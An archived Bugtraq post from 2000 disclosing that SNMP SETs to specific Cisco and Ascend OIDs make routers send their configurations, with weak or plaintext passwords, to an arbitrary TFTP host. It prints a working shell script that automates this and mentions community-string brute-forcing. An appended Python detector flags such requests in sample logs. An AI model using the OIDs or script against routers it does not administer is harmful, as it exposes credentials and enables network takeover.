Bugtraq mailing list archives

cisco/ascend snmp config tool or exploit? -- Re: snmp problems still alive


From: monti () USHOST COM (monti)
Date: Fri, 18 Feb 2000 01:17:52 -0600


Disclaimer: The attached utility is based on widely known public
information and its functionality is replicated in many very expensive
commercial products. This information is provided for educational purposes
only. I am not responsible for misuse of this tool or information.

May this script help make SNMP die the sad lonely death it deserves once
and for all!

On that note... I originally cobbled this together to keep the network
admins I worked with from doing annoying things like keeping tftp daemons
running on my Unix hosts for weeks on end. It's pretty handy for that too.

It's just a lame little script to automate snmp/tftp config dumps from
ciscos and ascends using snmp/tftp with a temporary tftp server. I
thought it might be of interest (to some) while we're on the subject
(again) of snmp router config downloads. I've seen several home-grown
versions of this for ciscos out there, a handful for ascends, but have not
run across any that do both, so...

The OIDs to accomplish this on ciscos and ascends are below. Basically in
both cases doing an SNMP set on certain variables will trigger the tftp
config upload from the target router.

'XXX' denotes IP address octets for where you want the config to go.

Cisco:
SNMP set .1.3.6.1.4.1.9.2.1.55.XXX.XXX.XXX.XXX type=s(string) "tftp-filename"

Ascend:
SNMP set .1.3.6.1.4.1.529.9.5.3.0 type=a(addr) XXX.XXX.XXX.XXX
SNMP set .1.3.6.1.4.1.529.9.5.4.0 type=s(string) "tftp-filename"

As everybody knows, Cisco type 7 hashes are trivial, and ascends keep
passwords unencrypted, so this tool or one of the zillion others like it
(HP Openview anybody?) could be used by crazed frothy-mouthed sociopaths
to dish out truckloads of evil upon meek internet-shoppers!!!@!@#$!!!

As others already have mentioned, it's worse too since you could just
replace a config if you're in the mood. The OIDs to accomplish that can
be found in the respective cisco and ascend MIBs nearby the ones outlined
above. I didn't put these in my script for fairly obvious reasons given
its original intended users ;)

-Eric Monti

--BTW. 9 out of 10 'forgetful admins' recommend the use of ADMsnmp for
brute-forcing communities!

On Tue, 15 Feb 2000, Gus Huber wrote:

It should be noted in this discussion that MANY of these devices also
through SNMP queries can be completely compromised by either sending or
receiving configuration files from arbitrary locations.  Both cisco and
ascend products support downloading and uploading of configuration files
via tftp from an SNMP query.  From that point it is trivial to sniff
network traffic.  AFAIK, ascend still ships with the SNMP communities set as
public for read-only, and write for RW.  Also many hardware devices do not
log queries sent to invalid SNMP communities in SNMPv1, so it is a simple
game of brute force to get those communities.


#!/bin/sh
#  grabrtrconf:
#  Pull router configs via tftp for ciscos and ascends. obviously trivial to
#  modify this for other network hardware that supports this type of thing.
#
#  - [type] can be one of cisco | ascend currently
#  - defaults to cisco
#  - requires cmu snmp utilities (snmpset specifically)
#  - use TFTPLISTEN and disable tftp from /etc/inetd.conf if you want to
#    launch a 'temporary' in.tftpd just to grab the file.
#  - 'pidof' only exists on linux that I know of which kind of makes this a
#    linux-only tool, unless/until I decide to stop relying on it.
#  - Set 'INT' to whatever your routable IP is.
#  - run as root (if you want to launch the tftp server)
#
#  - I know this is lame... but it works (most of the time).
#
#  by: Eric Monti 11/1997
# 

TFTPLISTEN="true"

DIR=/tftpboot #might want to use something else
WAIT=6
INT=ppp0
 
test "$4" = "" && echo "Usage: `basename $0` target write-community tftphost filename [type]" && exit 1

TYPE=$5
test "$5" = "" && TYPE="cisco"

IPADDR=$3
test "$IPADDR" = "." && IPADDR=`/sbin/ifconfig $INT | grep inet | sed "s/\:/\ /" | awk '{print $3}'`

echo $3

# quoted so that an empty TFTPLISTEN really skips the temporary inetd
if [ -n "$TFTPLISTEN" ];then
        echo "tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd $DIR" > /tmp/ind.conf
        /usr/sbin/inetd -d /tmp/ind.conf &
        rm /tmp/ind.conf
        rm -f $DIR/$4
        touch $DIR/$4
        chmod 666 $DIR/$4
fi

#CISCO get config
test "$TYPE" = "cisco" && \
snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.9.2.1.55.$IPADDR s $4

#ASCEND get config
if [ "$TYPE" = "ascend" ];then
  snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a $IPADDR 
  snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s $4
  snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.1.0 i 3
  snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a "0.0.0.0"
  snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s ""
fi

sleep $WAIT

# i got lazy and used pidof... so what. 
# I made pretty dots appear to make up for it!
if (test "`pidof in.tftpd`");then


 echo Receiving file: 
 while (test "`pidof in.tftpd`");do
        echo -n .
        sleep 1
 done
 echo
 echo Transfer Complete

fi

if [ -n "$TFTPLISTEN" ];then
        kill `cat /var/run/inetd.pid` # jeepers, i hope that wasnt the real1
fi
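Since, as Gus notes, the devices themselves often do not log bad community strings, the practical place to catch this activity is on the wire. The following is an added example (not part of the post or of grabrtrconf) that runs over a constructed, simplified log of SNMP requests and flags two things: any SET to the Cisco or Ascend config-export OIDs listed above (recovering the TFTP destination and filename from the request), and a burst of distinct community strings from one source against one target. The log line format, the addresses and the community strings are all made up for the example; a real deployment would feed it from a capture tool of your choice.

```python
"""Flag SNMP activity matching the config-export OIDs from the post.

Added example, not part of the original post or of grabrtrconf. The log
format below is an assumption invented for this example (one request per
line); all hosts, communities and filenames are constructed sample data.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# OIDs taken from the post. A SET here asks the router to push its config to
# a TFTP server: Cisco encodes the TFTP host in the OID suffix, Ascend sets
# the host and filename in separate objects under one prefix.
CISCO_CONFIG_EXPORT_PREFIX = ".1.3.6.1.4.1.9.2.1.55."
ASCEND_CONFIG_EXPORT_PREFIX = ".1.3.6.1.4.1.529.9.5."
ASCEND_TFTP_HOST_OID = ".1.3.6.1.4.1.529.9.5.3.0"
ASCEND_TFTP_FILE_OID = ".1.3.6.1.4.1.529.9.5.4.0"

# Constructed log format (assumption, not any real tool's output):
#   <date> <time> <src> -> <dst> <pdu> community=<c> oid=<oid> [value=<v>]
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+) "
    r"(?P<pdu>GET|GETNEXT|SET) community=(?P<community>\S+) "
    r"oid=(?P<oid>\S+)(?: value=(?P<value>\S+))?$"
)


@dataclass
class SnmpEvent:
    ts: str
    src: str
    dst: str
    pdu: str
    community: str
    oid: str
    value: Optional[str]


def parse_line(line: str) -> Optional[SnmpEvent]:
    """Parse one log line; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    return SnmpEvent(**m.groupdict()) if m else None


def config_export_alerts(events: List[SnmpEvent]) -> List[Dict[str, Optional[str]]]:
    """One alert per SET that touches a config-export OID."""
    alerts = []
    for e in events:
        if e.pdu != "SET":
            continue
        if e.oid.startswith(CISCO_CONFIG_EXPORT_PREFIX):
            alerts.append({"ts": e.ts, "router": e.dst, "requester": e.src,
                           "vendor": "cisco",
                           "tftp_host": e.oid[len(CISCO_CONFIG_EXPORT_PREFIX):],
                           "filename": e.value})
        elif e.oid.startswith(ASCEND_CONFIG_EXPORT_PREFIX):
            alerts.append({"ts": e.ts, "router": e.dst, "requester": e.src,
                           "vendor": "ascend",
                           "tftp_host": e.value if e.oid == ASCEND_TFTP_HOST_OID else None,
                           "filename": e.value if e.oid == ASCEND_TFTP_FILE_OID else None})
    return alerts


def community_guess_alerts(events: List[SnmpEvent], threshold: int = 5) -> List[Tuple[str, str, int]]:
    """(src, dst, count) for every source that tried >= threshold distinct communities."""
    seen = defaultdict(set)
    for e in events:
        seen[(e.src, e.dst)].add(e.community)
    return sorted((src, dst, len(c)) for (src, dst), c in seen.items() if len(c) >= threshold)


def analyse(lines: List[str]):
    events = [e for e in (parse_line(l) for l in lines) if e is not None]
    return config_export_alerts(events), community_guess_alerts(events)


# Constructed sample: six community guesses from 10.0.0.9, a Cisco export to
# 10.0.0.5, an Ascend export to 10.0.0.5, a benign sysContact SET, junk line.
SAMPLE_LOG = [
    "2000-02-15 10:00:01 10.0.0.9 -> 10.0.0.1 GET community=public oid=.1.3.6.1.2.1.1.1.0",
    "2000-02-15 10:00:01 10.0.0.9 -> 10.0.0.1 GET community=private oid=.1.3.6.1.2.1.1.1.0",
    "2000-02-15 10:00:02 10.0.0.9 -> 10.0.0.1 GET community=cisco oid=.1.3.6.1.2.1.1.1.0",
    "2000-02-15 10:00:02 10.0.0.9 -> 10.0.0.1 GET community=admin oid=.1.3.6.1.2.1.1.1.0",
    "2000-02-15 10:00:03 10.0.0.9 -> 10.0.0.1 GET community=write oid=.1.3.6.1.2.1.1.1.0",
    "2000-02-15 10:00:03 10.0.0.9 -> 10.0.0.1 GET community=secret oid=.1.3.6.1.2.1.1.1.0",
    "2000-02-15 10:05:00 10.0.0.5 -> 10.0.0.1 SET community=write oid=.1.3.6.1.4.1.9.2.1.55.10.0.0.5 value=rtr1-confg",
    "2000-02-15 10:06:00 10.0.0.5 -> 10.0.0.2 SET community=write oid=.1.3.6.1.4.1.529.9.5.3.0 value=10.0.0.5",
    "2000-02-15 10:06:00 10.0.0.5 -> 10.0.0.2 SET community=write oid=.1.3.6.1.4.1.529.9.5.4.0 value=max1-confg",
    "2000-02-15 10:07:00 10.0.0.7 -> 10.0.0.1 SET community=write oid=.1.3.6.1.2.1.1.4.0 value=noc@example.net",
    "this line is not an snmp record",
]

if __name__ == "__main__":
    exports, guesses = analyse(SAMPLE_LOG)
    for a in exports:
        print("CONFIG EXPORT", a)
    for src, dst, n in guesses:
        print(f"COMMUNITY GUESSING {src} -> {dst}: {n} distinct communities")
```

The benign sysContact SET is deliberately not flagged: the point is to alert on the specific objects that move a config off the box, not on every write. The community-guess threshold is per source/target pair with no time window, which is fine for a short capture but would need a sliding window on a busy management network.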